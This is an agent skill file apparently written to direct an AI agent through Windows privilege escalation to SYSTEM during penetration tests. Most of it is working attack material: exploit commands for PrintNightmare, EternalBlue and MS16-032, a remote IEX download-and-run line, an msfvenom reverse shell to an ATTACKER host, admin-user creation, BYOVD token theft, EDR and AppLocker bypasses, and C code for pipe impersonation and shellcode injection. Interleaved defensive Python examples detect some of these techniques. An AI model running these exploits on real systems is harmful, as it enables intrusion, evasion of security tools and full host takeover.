Agent skill: windows-kernel-exploits

Exploit Windows kernel vulnerabilities, vulnerable drivers, and privileged file operations for local privilege escalation to SYSTEM.

Install this agent skill to your project:

```bash
npx add-skill https://github.com/blacklanternsecurity/red-run/tree/main/skills/privesc/windows-kernel-exploits
```

SKILL.md:

# Windows Kernel Exploits & Privileged Operations
You are helping a penetration tester exploit kernel vulnerabilities, vulnerable drivers, and privileged file/pipe operations on a Windows system. All testing is under explicit written authorization.
Warning: Kernel exploits can crash the target system. Always warn before execution. Prefer reliable exploits and avoid experimental PoCs on production systems.
## Engagement Logging

Check for `./engagement/` directory. If absent, proceed without logging.

When an engagement directory exists:

- Print `[windows-kernel-exploits] Activated → <target>` to the screen on activation.
- Evidence → save significant output to `engagement/evidence/` with descriptive filenames (e.g., `sqli-users-dump.txt`, `ssrf-aws-creds.json`).
## State Management

Call `get_state_summary()` from the state MCP server to read current engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
## Prerequisites

- Shell access on Windows (cmd.exe, PowerShell)
- `systeminfo` output (for exploit matching)
- Ability to transfer and execute binaries on target
- Some exploits require specific privileges (SeLoadDriverPrivilege for BYOVD)
## Step 1: Assess — OS Version and Patch Level

Collect the information needed to match against known kernel CVEs.

```cmd
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
ver
wmic os get Caption, Version, BuildNumber, OSArchitecture
```

Save `systeminfo` output for offline analysis:

```cmd
systeminfo > C:\Windows\Temp\systeminfo.txt
```

Key information to note:

- OS name and version (e.g., Windows 10 Pro 1903)
- Build number (e.g., 18362)
- Architecture (x86 vs x64)
- Hotfix list and count
- Domain membership

Check loaded drivers (for BYOVD):

```cmd
driverquery /v /fo table
driverquery /si
```
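As an added example (not part of the red-run skill), the following Python parses a saved `systeminfo` capture into the fields listed above and checks it against the fix KBs this page names for MS16-032 (KB3139914) and MS17-010 (KB4013389). The sample capture is constructed. A missing KB is only a lead: it does not account for superseding cumulative updates or for whether the OS is in the CVE's affected list at all, which is what the WES-NG database handles in Step 2.

```python
"""Triage a saved `systeminfo` capture against the fix KBs this page names.

Added example, not part of the red-run skill.  The capture below is
constructed; the KB numbers come from the page (MS16-032 is fixed by
KB3139914, MS17-010 by KB4013389).
"""
import re

# Constructed `systeminfo` output, abridged to the fields the triage needs.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18362 N/A Build 18362
System Type:               x64-based PC
Domain:                    corp.example
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4497165
                           [02]: KB4498523
                           [03]: KB4501375
Network Card(s):           1 NIC(s) Installed.
"""

# Fix KB for each named CVE on this page that states one.
PATCH_FOR_CVE = {
    "MS16-032 (CVE-2016-0099)": "KB3139914",
    "MS17-010 (CVE-2017-0144)": "KB4013389",
}


def parse_systeminfo(text):
    """Extract OS name, version, build, architecture, domain and hotfix list."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        field = re.match(r"^([A-Za-z ()]+?):\s+(.*)$", line)
        if field:
            key, value = field.group(1), field.group(2).strip()
            if key == "OS Name":
                info["os_name"] = value
            elif key == "OS Version":
                info["os_version"] = value
                build = re.search(r"Build (\d+)", value)
                info["build"] = int(build.group(1)) if build else None
            elif key == "System Type":
                info["arch"] = "x64" if "x64" in value else "x86"
            elif key == "Domain":
                info["domain"] = value
        # Hotfix entries are indented continuation lines: "[01]: KB4497165"
        hotfix = re.search(r"\[\d+\]:\s*(KB\d+)", line)
        if hotfix:
            info["hotfixes"].append(hotfix.group(1))
    return info


def missing_patches(info, patch_for_cve=PATCH_FOR_CVE):
    """Named CVEs whose fix KB is not in the hotfix list.

    A missing KB is a lead, not a confirmation: cumulative updates supersede
    older KBs and the OS may not be in the CVE's affected list, so cross-check
    with WES-NG (which tracks supersedence) before concluding anything.
    """
    installed = set(info["hotfixes"])
    return [cve for cve, kb in patch_for_cve.items() if kb not in installed]


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed)
    print("fix KB not present for:", missing_patches(parsed))
```

Feed it `C:\Windows\Temp\systeminfo.txt` from the capture above instead of the constructed sample; the output is the same shape the WES-NG step consumes, so the two can be compared directly.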
## Step 2: Exploit Suggester

Use automated tools to match the target's patch level against known kernel CVEs.

### WES-NG (Primary — Run on Attacker Machine)

```bash
# Update vulnerability database
python3 wes.py --update

# Analyze systeminfo output
python3 wes.py systeminfo.txt

# Filter for specific impact
python3 wes.py systeminfo.txt --impact "Elevation of Privilege"
python3 wes.py systeminfo.txt --exploits-only
```

### Watson (On Target — .NET 2.0+)

```cmd
Watson.exe
```

Watson checks for: CVE-2019-0836, CVE-2019-0841, CVE-2019-1064, CVE-2019-1130, CVE-2019-1253, CVE-2019-1315, CVE-2019-1385, CVE-2019-1388, CVE-2019-1405, CVE-2020-0668, CVE-2020-0683, CVE-2020-1013, and more.

### Legacy windows-exploit-suggester

```bash
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2024-01-01-mssb.xlsx --systeminfo systeminfo.txt
```

### Triage Results

Prioritize by:

- Reliability — exploits with public, stable PoCs
- Impact — SYSTEM shell vs arbitrary write
- Crash risk — avoid pool corruption exploits on production
- Architecture match — x86 vs x64 binary must match target
## Step 3: Named Kernel CVE Exploitation

### PrintNightmare Local (CVE-2021-1675 / CVE-2021-34527)

Print Spooler RCE that also works for local privilege escalation. Loads a DLL as SYSTEM via the Print Spooler service.

Affected: Windows with Print Spooler running, pre-July 2021 patches.

Check vulnerability:

```bash
# Check if Print Spooler RPC is available
python3 rpcdump.py @TARGET | egrep 'MS-RPRN|MS-PAR'
```

```cmd
:: Check Spooler service status
sc query Spooler
```

Local privilege escalation (LPE):

```cmd
:: SharpPrintNightmare — direct LPE
SharpPrintNightmare.exe C:\Windows\Temp\payload.dll
```

```powershell
# Invoke-Nightmare (PowerShell) — adds local admin
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare    # Default: adds adm1n/P@ssw0rd
Invoke-Nightmare -NewUser "hacker" -NewPassword "Passw0rd!"
Invoke-Nightmare -DLL "C:\absolute\path\to\payload.dll"
```

```
# Mimikatz (v2.2.0+)
misc::printnightmare /server:localhost /library:C:\Windows\Temp\payload.dll
```

Remote exploitation (requires SMB or WebDAV share):

```bash
# Host payload DLL via Impacket SMB
python3 smbserver.py share /tmp/smb/

# Remote exploit
python3 CVE-2021-1675.py domain/user:Pass@TARGET '\\ATTACKER\share\payload.dll'
```

```cmd
:: SharpPrintNightmare remote
SharpPrintNightmare.exe '\\ATTACKER\share\payload.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_*\Amd64\UNIDRV.DLL' '\\TARGET'
```

Error codes: `0x5` = share permissions issue, `0x525` = account doesn't exist, `0x180` = use SMBv3 instead of v2.
### MS17-010 EternalBlue (CVE-2017-0144)

Affected: Windows 7, 2008 R2, 2003, XP (pre-KB4013389). Remote SYSTEM RCE via SMB.

Detection:

```bash
nmap -Pn -p445 --script smb-vuln-ms17-010 TARGET
netexec smb TARGET -M ms17-010
```

Exploitation:

```
# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET
set LHOST ATTACKER
run
```

```bash
# Standalone (Python2)
git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
python2 send_and_execute.py TARGET shell.exe
```

### MS16-032 (CVE-2016-0099) — Secondary Logon Handle Leak

Affected: Windows 7, 8, 10, 2008, 2012 R2 (pre-KB3139914). Local escalation.

```cmd
wmic qfe list | findstr "3139914"
```

If patch not found:

```powershell
# PowerShell exploit
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1')
Invoke-MS16032 -Command "cmd /c start cmd.exe"
```

```
# Metasploit
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```

### MS15-051 (CVE-2015-1701) — Win32k Client Copy Image

Affected: Windows 2003, 2008, 7, 8, 2012. Local SYSTEM escalation.

```cmd
:: Usage
ms15-051.exe "whoami"
ms15-051.exe "cmd.exe /c net localgroup administrators user /add"
```

### MS10-015 KiTrap0D (CVE-2010-0232)

Affected: Windows NT, 2000, 2003, 2008, XP, Vista, 7. Local SYSTEM.

```
# Metasploit
use exploit/windows/local/ms10_015_kitrap0d
```

### CVE-2019-1388 — Certificate Dialog Elevation

Affected: Windows 7, Windows 10 LTSC 10240. Interactive desktop required.

- Right-click `hhupd.exe` → Run as administrator
- Click "Show information about the publisher's certificate"
- Click the "Issued by" URL link
- Browser opens as SYSTEM — use File → Open to launch `cmd.exe`

Note: Requires interactive desktop access. Does not work via remote shell.

### CVE-2020-0796 SMBGhost

Affected: Windows 10 1903-1909, Server v1903-v1909.

Primarily remote RCE but local LPE variants exist. Exploit reliability is low — use only as a last resort.
### Kernel CVE Quick Reference

| CVE | Name | Affected | Type | Reliability |
|---|---|---|---|---|
| CVE-2021-1675 | PrintNightmare | Pre-Jul 2021 | LPE/RCE | High |
| CVE-2017-0144 | EternalBlue | 7/2008/2003/XP | RCE | High |
| CVE-2016-0099 | MS16-032 | 7/8/10/2008/2012 | LPE | High |
| CVE-2015-1701 | MS15-051 | 2003/2008/7/8/2012 | LPE | High |
| CVE-2010-0232 | KiTrap0D | Pre-Win8 | LPE | Medium |
| CVE-2019-1388 | Cert Dialog | 7/10 LTSC | LPE | Medium (interactive) |
| CVE-2020-0796 | SMBGhost | 10 1903-1909 | RCE/LPE | Low |
| CVE-2021-36934 | HiveNightmare | Pre-Jul 2021 | Info Disclosure | High |
## Step 4: BYOVD (Bring Your Own Vulnerable Driver)

Load a known-vulnerable signed kernel driver to gain arbitrary kernel read/write, then use it to steal the SYSTEM token.

### Prerequisites

- Admin access or SeLoadDriverPrivilege
- Vulnerable driver binary (signed, so Windows loads it)
- Kernel offsets for target OS version

### Known Vulnerable Drivers

| Driver | Vulnerability | Use Case |
|---|---|---|
| Capcom.sys | Arbitrary code execution in kernel | Direct kernel shellcode |
| RTCore64.sys | Arbitrary memory R/W via IOCTL | Token theft |
| DBUtil_2_3.sys | Arbitrary memory write | Token theft |

Reference: https://www.loldrivers.io/ — curated database of vulnerable drivers with hashes and CVE references.

### Enumerate Loaded Drivers

```cmd
driverquery /v /fo table
driverquery /si
```

```powershell
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer, InfName | Format-Table
```
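An added defensive check (not the skill's code) that matches loaded drivers against a vulnerable-driver blocklist: first by SHA-256 of the file, so a renamed copy such as the `vuln.sys` in the workflow below is still caught, then by file name when the hash is unknown, and finally it flags any driver loaded from outside the standard drivers directory. It assumes `driverquery /v /fo csv` output with `Module Name` and `Path` columns; the CSV excerpt, file bytes and blocklist hashes are all constructed placeholders. A real run would take hashes from the loldrivers.io list referenced above and read the files from disk.

```python
"""Flag loaded drivers that match a vulnerable-driver blocklist by hash or name.

Added example, not part of the red-run skill.  Everything below that looks
like data (CSV rows, file bytes, blocklist hashes) is constructed; the three
driver names come from the page's table.
"""
import csv
import hashlib
import io

# Constructed `driverquery /v /fo csv` excerpt, reduced to the columns used.
SAMPLE_DRIVERQUERY_CSV = """\
"Module Name","Display Name","Driver Type","State","Path"
"ACPI","Microsoft ACPI Driver","Kernel","Running","C:\\Windows\\system32\\drivers\\ACPI.sys"
"RTCore64","Micro-Star MSI Afterburner","Kernel","Running","C:\\Windows\\Temp\\RTCore64.sys"
"VulnDriver","VulnDriver","Kernel","Running","C:\\Windows\\Temp\\vuln.sys"
"""

# Constructed file contents standing in for the bytes read from each path.
SAMPLE_FILES = {
    r"C:\Windows\system32\drivers\ACPI.sys": b"ACPI driver bytes (constructed)",
    r"C:\Windows\Temp\RTCore64.sys": b"RTCore64 driver bytes (constructed)",
    r"C:\Windows\Temp\vuln.sys": b"renamed DBUtil_2_3 bytes (constructed)",
}


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# Constructed blocklist: hashes are computed from the constructed bytes above
# and are NOT real loldrivers.io hashes; the Capcom entry is a placeholder.
BLOCKLIST = {
    sha256(SAMPLE_FILES[r"C:\Windows\Temp\RTCore64.sys"]): "RTCore64.sys (arbitrary memory R/W via IOCTL)",
    sha256(SAMPLE_FILES[r"C:\Windows\Temp\vuln.sys"]): "DBUtil_2_3.sys (arbitrary memory write)",
    "0" * 64: "Capcom.sys (placeholder hash)",
}
KNOWN_NAMES = {"capcom.sys", "rtcore64.sys", "dbutil_2_3.sys"}
DRIVERS_DIR = r"c:\windows\system32\drivers"


def parse_driverquery_csv(text):
    """Yield (module_name, path) pairs from driverquery /v /fo csv output."""
    for row in csv.DictReader(io.StringIO(text)):
        yield row["Module Name"], row["Path"]


def audit_drivers(csv_text, read_file, blocklist=BLOCKLIST):
    """Return (module, path, reason) findings.

    read_file(path) -> bytes or None is injected so the audit can run over a
    snapshot; on a live host pass a function that opens the path read-only.
    """
    findings = []
    for module, path in parse_driverquery_csv(csv_text):
        data = read_file(path)
        digest = sha256(data) if data is not None else None
        basename = path.rsplit("\\", 1)[-1].lower()
        if digest in blocklist:
            findings.append((module, path, "hash match: " + blocklist[digest]))
        elif basename in KNOWN_NAMES:
            findings.append((module, path, "name match only; hash unknown"))
        elif not path.lower().startswith(DRIVERS_DIR):
            findings.append((module, path, "driver loaded from outside the drivers directory"))
    return findings


if __name__ == "__main__":
    for finding in audit_drivers(SAMPLE_DRIVERQUERY_CSV, SAMPLE_FILES.get):
        print(finding)
```

The hash comparison is what matters: `sc create` accepts any file name, so a name-only check misses the renamed copy, while a hash check catches it regardless of path. Windows' own vulnerable driver blocklist (enforced under HVCI / Smart App Control) covers many of the same hashes; this check is for hosts where that enforcement is not on.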
### Generic BYOVD Workflow

- Load the vulnerable driver:

  ```cmd
  sc create VulnDriver type=kernel binPath=C:\Windows\Temp\vuln.sys
  sc start VulnDriver
  ```

- Exploit the driver for kernel R/W (tool-specific — see driver documentation).

- Token theft — copy SYSTEM token to current process.

  The standard kernel exploitation primitive: walk the EPROCESS linked list to find PID 4 (SYSTEM), read its token, and overwrite the current process's token.

  ```
  // Pseudocode (EPROCESS offsets vary per OS build)
  1. Get ntoskrnl base via EnumDeviceDrivers or NtQuerySystemInformation
  2. Resolve PsInitialSystemProcess → SYSTEM EPROCESS address
  3. Walk ActiveProcessLinks to find current process EPROCESS
  4. Read SYSTEM token (EPROCESS + Token offset), mask EX_FAST_REF low bits
  5. Write SYSTEM token to current process EPROCESS
  6. Spawn cmd.exe → now running as SYSTEM
  ```

  EPROCESS offsets (must be resolved per build via WinDbg symbols):

  - UniqueProcessId: ~0x440
  - ActiveProcessLinks: ~0x448
  - Token: ~0x4b8
  - EX_FAST_REF mask: `& ~0xF`

- Cleanup:

  ```cmd
  sc stop VulnDriver
  sc delete VulnDriver
  ```
### BYOVD for EDR Bypass

Vulnerable drivers can also be used to disable EDR/PPL protections:

- Kill protected processes by zeroing their token
- Unload EDR kernel callbacks
- Disable PPL (Protected Process Light) on LSASS

Tools: PPLKiller, EDRSandblast, KDU (Kernel Driver Utility).
## Step 5: Privileged File Write Exploits

These techniques exploit Windows services that load DLLs from predictable paths. You need the ability to write a DLL to the target path (often requires an arbitrary file write primitive or writable directory).

### DiagHub (Pre-Windows 10 1903)

DiagnosticHub Standard Collector Service loads DLLs from System32.

```cmd
:: Place payload DLL in System32 (requires write access)
copy payload.dll C:\Windows\System32\payload.dll
:: Trigger DLL load
diaghub.exe C:\ProgramData\ payload.dll
```

Tool: https://github.com/xct/diaghub

### UsoDLLLoader (Windows 10 1903-2004)

Update Session Orchestrator loads WindowsCoreDeviceInfo.dll from System32.

```cmd
:: Place DLL
copy payload.dll C:\Windows\System32\WindowsCoreDeviceInfo.dll
:: Trigger via USO
UsoDllLoader.exe
:: Alternative trigger
usoclient StartInteractiveScan
```

Result: Bind shell on port 1337 (default payload). Tool: https://github.com/itm4n/UsoDllLoader

### WerTrigger (Windows Error Reporting)

WER service loads phoneinfo.dll from a predictable path.

```cmd
:: Setup
copy phoneinfo.dll C:\Windows\System32\phoneinfo.dll
:: Trigger
WerTrigger.exe
```

Result: SYSTEM shell. Tool: https://github.com/sailay1996/WerTrigger

### WerMgr (WER Directory Creation)

```cmd
:: Setup
dircreate2system.exe
```

Creates `wermgr.exe.local` directory with weak permissions, loads DLL via DotLocal redirection.

Tool: https://github.com/binderlabs/DirCreate2System
### Privileged File Delete → SYSTEM (MSI Rollback)

An arbitrary file delete primitive can be escalated to SYSTEM via MSI rollback abuse:

- Install a crafted MSI that triggers an error during installation
- Exploit deletes `C:\Config.Msi` during rollback window
- Recreate `C:\Config.Msi` with weak DACL
- Drop malicious rollback files
- Windows Installer executes rollback payload as SYSTEM

Tool: https://github.com/thezdi/PoC/tree/master/FilesystemEoPs/FolderOrFileDeleteToSystem

Post-exploit via On-Screen Keyboard:

- Exploit writes `HID.dll` to `C:\Program Files\Common Files\microsoft shared\ink\`
- Press Ctrl+Alt+Del → open On-Screen Keyboard
- `osk.exe` loads `HID.dll` from ink directory → SYSTEM shell
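An added hunting check (not part of the red-run skill or of the tools linked above) that looks for the on-disk artifacts these techniques leave behind. The DLL names and paths come from this section; the `*.exe.local` glob generalizes the WerMgr case to any System32 executable, since DotLocal redirection applies to every executable, not only `wermgr.exe`. The directory snapshot is constructed so the check runs offline; on a live host it would come from a directory walk. `C:\Config.Msi` is deliberately left out: its existence is normal during an install, and what matters there is a weak DACL, which this check does not read.

```python
"""Hunt for on-disk artifacts of the privileged-file-write techniques above.

Added example, not part of the red-run skill.  Paths are from the page; the
snapshot is constructed.  `os.walk` over C:\\ would replace it on a live host.
"""
import fnmatch

# Exact paths named on the page; a file at any of them is unexpected on a clean host.
EXACT_ARTIFACTS = {
    r"C:\Windows\System32\WindowsCoreDeviceInfo.dll": "UsoDLLLoader payload location",
    r"C:\Windows\System32\phoneinfo.dll": "WerTrigger payload location",
    r"C:\Windows\System32\wermgr.exe.local": "DotLocal redirection directory (WerMgr)",
    r"C:\Program Files\Common Files\microsoft shared\ink\HID.dll": "osk.exe HID.dll hijack",
}

# Generalization: DotLocal redirection works for any executable, so a
# <name>.exe.local directory beside any System32 binary deserves a look.
GLOB_ARTIFACTS = {
    r"C:\Windows\System32\*.exe.local": "DotLocal redirection directory beside a System32 executable",
}

# Constructed snapshot of paths present on a host (case varies on purpose;
# NTFS is case-insensitive, so the match must be too).
SAMPLE_SNAPSHOT = [
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Windows\System32\WindowsCoreDeviceInfo.dll",
    r"C:\Windows\System32\wermgr.exe.local",
    r"C:\Windows\System32\dllhost.exe.local",
    r"C:\Program Files\Common Files\microsoft shared\ink\hid.dll",
]


def classify(path):
    """Return the reason a path is suspicious, or None if it is not a known artifact."""
    lowered = path.lower()
    for known, reason in EXACT_ARTIFACTS.items():
        if lowered == known.lower():
            return reason
    for pattern, reason in GLOB_ARTIFACTS.items():
        if fnmatch.fnmatchcase(lowered, pattern.lower()):
            return reason
    return None


def find_artifacts(existing_paths):
    """Return (path, reason) for every path in the snapshot that is a known artifact."""
    hits = []
    for path in existing_paths:
        reason = classify(path)
        if reason:
            hits.append((path, reason))
    return hits


if __name__ == "__main__":
    for hit in find_artifacts(SAMPLE_SNAPSHOT):
        print(hit)
```

A hit on a `.local` directory is worth a look even when it is empty: the directory itself is the primitive these tools create, and the DLL may be dropped later.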
## Step 6: Named Pipe & Leaked Handle Exploitation

### Named Pipe Impersonation

Create a named pipe, trick a privileged process into connecting, then impersonate its token. This is the foundation of all Potato exploits.

Core pattern (C):

```c
#include <windows.h>

// 1. Create named pipe (CreateNamedPipe reports failure as INVALID_HANDLE_VALUE, not NULL)
HANDLE hPipe = CreateNamedPipeA("\\\\.\\pipe\\evil",
    PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
    1, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE) return 1;
// 2. Wait for privileged client
ConnectNamedPipe(hPipe, NULL);
// 3. MUST read at least one message before impersonation
char buf[4]; DWORD rb;
ReadFile(hPipe, buf, sizeof(buf), &rb, NULL);
// 4. Impersonate client token (fails with ERROR_CANNOT_IMPERSONATE if nothing was read)
if (!ImpersonateNamedPipeClient(hPipe)) return 1;
// 5. Open impersonation token → duplicate to primary → CreateProcessWithTokenW
```

Common triggers to coerce privileged connections:

- Print Spooler RPC (`ms-rprn` pipe) → PrintSpoofer
- DCOM OXID resolver → RoguePotato
- MS-EFSR (EFS) pipe → EfsPotato
- Custom service coercion

For full Potato family exploitation, route to windows-token-impersonation.
### Leaked Handle Exploitation

If a privileged process creates a child with `bInheritHandles=TRUE`, the child inherits open handles to privileged resources.

Enumerate inherited handles:

```cmd
:: Sysinternals Handle tool
handle64.exe /a /p <PID>
```

Exploit inherited process handle:

```c
// hProc: the inherited handle, assumed to carry PROCESS_ALL_ACCESS to a SYSTEM process.
// payload / payload_len: shellcode buffer and its length.
// 1. Allocate memory in privileged process
LPVOID addr = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
// 2. Write shellcode
WriteProcessMemory(hProc, addr, payload, payload_len, NULL);
// 3. Create thread in privileged process
//    RtlCreateUserThread is an undocumented ntdll.dll export with no public header;
//    resolve it with GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlCreateUserThread").
HANDLE hThread;
RtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, addr, NULL, &hThread, NULL);
```

Alternative — spawn child with privileged parent:

```c
#include <windows.h>

// Use inherited SYSTEM process handle hProc as parent for new process
STARTUPINFOEXA si = {0};
PROCESS_INFORMATION pi = {0};
SIZE_T size = 0;
// First call only reports the buffer size needed (it returns FALSE by design)
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0,
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, TRUE,
    EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL,
    (LPSTARTUPINFOA)&si, &pi);
```

Tools: LeakedHandlesFinder
## Step 7: Restricted Shell Escape (Pre-Requisite)

If you're in a restricted shell, escape it before attempting kernel exploitation.

### PowerShell Constrained Language Mode (CLM) Bypass

```powershell
# Check current language mode
$ExecutionContext.SessionState.LanguageMode

# Downgrade to PowerShell v2 (if available — FullLanguage mode)
powershell -Version 2
```

### AppLocker Bypass via LOLBins

```cmd
:: MSBuild — compile and execute inline C#
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe task.xml

:: InstallUtil — execute .NET assembly
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

:: regsvcs / regasm
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe payload.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe payload.dll /U
```

## Step 8: Escalate or Pivot
## Troubleshooting

### Exploit crashes the target

Kernel exploits that corrupt pool memory can BSOD the system. Always check exploit notes for stability warnings. Prefer LPE exploits with "stable" or "reliable" tags. On production systems, try non-kernel vectors first (token impersonation, services, UAC).

### "Access Denied" loading driver (BYOVD)

SeLoadDriverPrivilege or admin access is required. Check `whoami /priv`. If not available, escalate via other vectors first.

### Exploit binary wrong architecture

x86 exploits fail on x64 and vice versa. Check `systeminfo | findstr "System Type"`. Download the correct architecture binary. Some exploits (PrintNightmare DLL) must match the Spooler service architecture.

### WES-NG reports many CVEs but none have public exploits

WES-NG lists all missing patches, not just exploitable ones. Filter with `--exploits-only` to show only CVEs with known public exploits. Cross-reference with https://github.com/SecWiki/windows-kernel-exploits for compiled binaries.

### PrintNightmare fails with "not vulnerable"

Check: (1) Spooler service is running, (2) patches pre-July 2021, (3) no `RestrictDriverInstallationToAdministrators` registry key. On DCs, check if Pre Windows 2000 Compatibility group is populated.
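An added check (not the skill's code) that turns the three PrintNightmare conditions above, and the Spooler status check in Step 3, into a script over captured command output: the state line of `sc query Spooler` and the `reg query` output for the Point and Print policy key. The value name is from this page; the key path `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint` is the one Microsoft documents for that value and is stated here as an assumption. Both captures are constructed. The patch-level condition is passed in as a boolean because it comes from the Step 1 triage, not from these two commands.

```python
"""Evaluate the page's three PrintNightmare preconditions from captured output.

Added example, not part of the red-run skill.  The registry key path below is
an assumption (Microsoft's documented location for the value the page names);
the two captures are constructed.
"""
import re

# Assumed policy key holding RestrictDriverInstallationToAdministrators.
POINT_AND_PRINT_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

# Constructed `sc query Spooler` output.
SAMPLE_SC_QUERY = """\
SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
"""

# Constructed `reg query` output for the key above with the restriction enabled.
SAMPLE_REG_QUERY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x1
"""


def spooler_running(sc_output):
    """True when the STATE line of `sc query` reports RUNNING."""
    state = re.search(r"^\s*STATE\s*:\s*\d+\s+(\w+)", sc_output, re.MULTILINE)
    return bool(state) and state.group(1) == "RUNNING"


def restrict_driver_install_enabled(reg_output):
    """True only if the value exists and is nonzero.

    A missing value (reg query prints an error and no value line) means the
    default applies, which is the condition the page lists as exploitable.
    """
    value = re.search(
        r"RestrictDriverInstallationToAdministrators\s+REG_DWORD\s+0x([0-9a-fA-F]+)",
        reg_output,
    )
    return bool(value) and int(value.group(1), 16) != 0


def spooler_exposure(sc_output, reg_output, patched_after_july_2021):
    """Return the list of page conditions that still hold; empty means none do."""
    findings = []
    if spooler_running(sc_output):
        findings.append("Spooler service is running")
    if not patched_after_july_2021:
        findings.append("July 2021 Spooler patches not confirmed")
    if not restrict_driver_install_enabled(reg_output):
        findings.append("RestrictDriverInstallationToAdministrators not set")
    return findings


if __name__ == "__main__":
    print(spooler_exposure(SAMPLE_SC_QUERY, SAMPLE_REG_QUERY, patched_after_july_2021=True))
```

On a host where only "Spooler service is running" remains, the service is still exposed surface worth stopping on systems that do not print; the other two findings are the ones that make the named exploits applicable.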